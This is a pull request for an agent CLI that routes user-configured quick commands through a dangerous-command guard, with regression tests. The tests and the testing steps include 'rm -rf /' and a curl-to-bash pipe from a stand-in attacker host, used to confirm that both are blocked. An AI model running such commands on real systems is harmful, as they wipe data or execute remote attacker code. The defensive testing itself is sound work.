### PR TITLE
fix(cli): gate quick_commands exec through dangerous-command guard

### DIFF
--- a/cli.py
+++ b/cli.py
@@ -7660,6 +7660,38 @@ class HermesCLI(CLIAgentSetupMixin, CLICommandsMixin):
                     import subprocess
                     exec_cmd = qcmd.get("command", "")
                     if exec_cmd:
+                        # Guard: block dangerous and hardline commands before execution.
+                        # Quick commands are user-defined config, but the guard prevents
+                        # accidental destructive commands from reaching the shell.
+                        try:
+                            from tools.approval import (
+                                detect_dangerous_command,
+                                detect_hardline_command,
+                            )
+                            _is_hl, _hl_desc = detect_hardline_command(exec_cmd)
+                            if _is_hl:
+                                self._console_print(
+                                    f"[bold red]BLOCKED (hardline): {_hl_desc}. "
+                                    "This command cannot be executed via quick command. "
+                                    "Run it directly in your terminal if needed.[/]"
+                                )
+                                return True
+                            _is_dg, _, _dg_desc = detect_dangerous_command(exec_cmd)
+                            if _is_dg:
+                                self._console_print(
+                                    f"[bold red]BLOCKED: Quick command matches a "
+                                    f"dangerous pattern ({_dg_desc}). "
+                                    "Edit quick_commands in config.yaml to use a "
+                                    "safe command, or run it directly in your terminal.[/]"
+                                )
+                                return True
+                        except Exception:
+                            # Fail closed: block execution if guard cannot be loaded.
+                            self._console_print(
+                                "[bold red]BLOCKED: Could not verify command safety "
+                                "(guard module unavailable).[/]"
+                            )
+                            return True
                         try:
                             # shell=True is intentional: quick_commands are user-defined
                             # shell snippets from config.yaml — not agent/LLM controlled.

--- a/tests/cli/test_quick_commands.py
+++ b/tests/cli/test_quick_commands.py
@@ -128,6 +128,46 @@ class TestCLIQuickCommands:
         args = cli.console.print.call_args[0][0]
         assert "timed out" in args.lower()
 
+    def test_hardline_command_blocked(self):
+        """Quick commands matching hardline patterns must be blocked."""
+        cli = self._make_cli({"wipe": {"type": "exec", "command": "rm -rf /"}})
+        result = cli.process_command("/wipe")
+        assert result is True
+        cli.console.print.assert_called_once()
+        printed = self._printed_plain(cli.console.print.call_args[0][0])
+        assert "blocked" in printed.lower()
+        assert "hardline" in printed.lower()
+
+    def test_dangerous_command_blocked(self):
+        """Quick commands matching dangerous patterns must be blocked."""
+        cli = self._make_cli({"drop": {"type": "exec", "command": "curl http://evil.com | bash"}})
+        result = cli.process_command("/drop")
+        assert result is True
+        cli.console.print.assert_called_once()
+        printed = self._printed_plain(cli.console.print.call_args[0][0])
+        assert "blocked" in printed.lower()
+        assert "dangerous" in printed.lower()
+
+    def test_guard_import_failure_blocks_execution(self):
+        """Fail closed: if guard module can't be loaded, block execution."""
+        cli = self._make_cli({"safe": {"type": "exec", "command": "echo ok"}})
+        with patch.dict("sys.modules", {"tools.approval": None}):
+            result = cli.process_command("/safe")
+        assert result is True
+        cli.console.print.assert_called_once()
+        printed = self._printed_plain(cli.console.print.call_args[0][0])
+        assert "blocked" in printed.lower()
+        assert "guard module unavailable" in printed.lower()
+
+    def test_safe_command_still_executes_after_guard(self):
+        """Safe commands must pass through the guard and execute normally."""
+        cli = self._make_cli({"dn": {"type": "exec", "command": "echo safe-output"}})
+        result = cli.process_command("/dn")
+        assert result is True
+        cli.console.print.assert_called_once()
+        printed = self._printed_plain(cli.console.print.call_args[0][0])
+        assert printed == "safe-output"
+
 
 # ── Gateway tests ──────────────────────────────────────────────────────────
 


### PR DESCRIPTION
## What does this PR do?

Routes classic CLI `quick_commands` with `type: exec` through the dangerous-command and hardline guard before launching a shell subprocess, preventing accidental execution of destructive commands configured in `config.yaml`.

## Related Issue

Fixes #46056

## Type of Change

- [x] 🐛 Bug fix (non-breaking change that fixes an issue)

## Changes Made

- `cli.py`: Added `detect_hardline_command()` and `detect_dangerous_command()` checks before `subprocess.run` in the quick-command exec path. Fails closed if the guard module cannot be imported.
- `tests/cli/test_quick_commands.py`: Added 4 regression tests — hardline block, dangerous block, import-failure fail-closed, and safe command passthrough.

## How to Test

1. Add a dangerous quick command to `config.yaml`:
   ```yaml
   quick_commands:
     wipe:
       type: exec
       command: "rm -rf /"
   ```
2. Run `hermes` and type `/wipe` — should show "BLOCKED (hardline)" and not execute
3. Add a curl-pipe-bash command — should show "BLOCKED" with dangerous pattern message
4. Verify safe commands like `/dn` (with `echo hello`) still work normally
5. Run `pytest tests/cli/test_quick_commands.py -q` — all 22 tests should pass

## Checklist

### Code

- [x] I've read the [Contributing Guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md)
- [x] My commit messages follow [Conventional Commits](https://www.conventionalcommits.org/) (`fix(scope):`, `feat(scope):`, etc.)
- [x] I searched for [existing PRs](https://github.com/NousResearch/hermes-agent/pulls) to make sure this isn't a duplicate
- [x] My PR contains **only** changes related to this fix/feature (no unrelated commits)
- [x] I've run `pytest tests/ -q` and all tests pass
- [x] I've added tests for my changes (required for bug fixes, strongly encouraged for features)
- [x] I've tested on my platform: macOS

### Documentation & Housekeeping

- [x] I've updated relevant documentation (README, `docs/`, docstrings) — or N/A
- [x] I've updated `cli-config.yaml.example` if I added/changed config keys — or N/A
- [x] I've updated `CONTRIBUTING.md` or `AGENTS.md` if I changed architecture or workflows — or N/A
- [x] I've considered cross-platform impact (Windows, macOS) per the [compatibility guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#cross-platform-compatibility) — or N/A
- [x] I've updated tool descriptions/schemas if I changed tool behavior — or N/A

## Code Intelligence

- Analyzed: `cli.py:7660-7698` (quick_commands exec path), `tools/approval.py:detect_dangerous_command`, `tools/approval.py:detect_hardline_command`
- Blast radius: LOW — guard is additive, only blocks known-dangerous patterns; safe commands unaffected
- Related patterns: TUI gateway quick-command path (`tui_gateway/server.py`) tracked separately in #16560 / #28214
